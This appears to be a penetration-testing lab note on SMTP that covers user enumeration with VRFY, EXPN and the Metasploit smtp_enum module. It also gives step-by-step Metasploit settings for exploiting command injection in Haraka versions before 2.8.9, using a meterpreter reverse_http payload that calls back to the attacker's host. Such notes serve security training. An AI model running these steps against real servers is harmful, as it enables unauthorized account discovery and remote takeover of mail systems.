** #SMTP (Simple Mail Transfer Protocol)** [ Port: 25 or 465 or 587]

SMTP: is a communication protocol that is used for the transmission of email.

• SMTP uses TCP port 25 by default. It is can also be configured to run on TCP port
  465 and 587.

• We can utilize auxiliary modules to enumerate the version of SMTP as well as
  user accounts on the target system.

search type:auxiliary name:smtp

• Search AUX modules.

To connect to a SMTP server we use netcat: nc <ip> <port>

• The SMTP service has two internal commands that allow the enumeration
  of users:
• VRFY: (confirming the names of valid users)
• EXPN: (which reveals the actual address of users aliases and lists of e-mail (mailing lists))

Haraka SMTP server:

is an Open-Source high performance SMTP server developed in Node.js.
The Haraka SMTP server comes with a plugin for processing attachments.
Haraka versions prior to V2.8.9 are vulnerable to command injection.

MSF Module:

exploit/linux/smtp/haraka

Then

set rhost <target_ip>

Then

set SRVPORT 9898

Then

set email_to root@attackdefense.test

Then set a staged payload:

set payload linux/x64/meterpreter_reverse_http

set LHOST

set LHOST <attacking_IP>

MSF Modules:

This module is very useful for collecting existing usernames on the target:

auxiliary/scanner/smtp/smtp_enum

• set UNIXONLY false If you are not working on a Linux target....
• Also select a proper USER_FILE based on the target.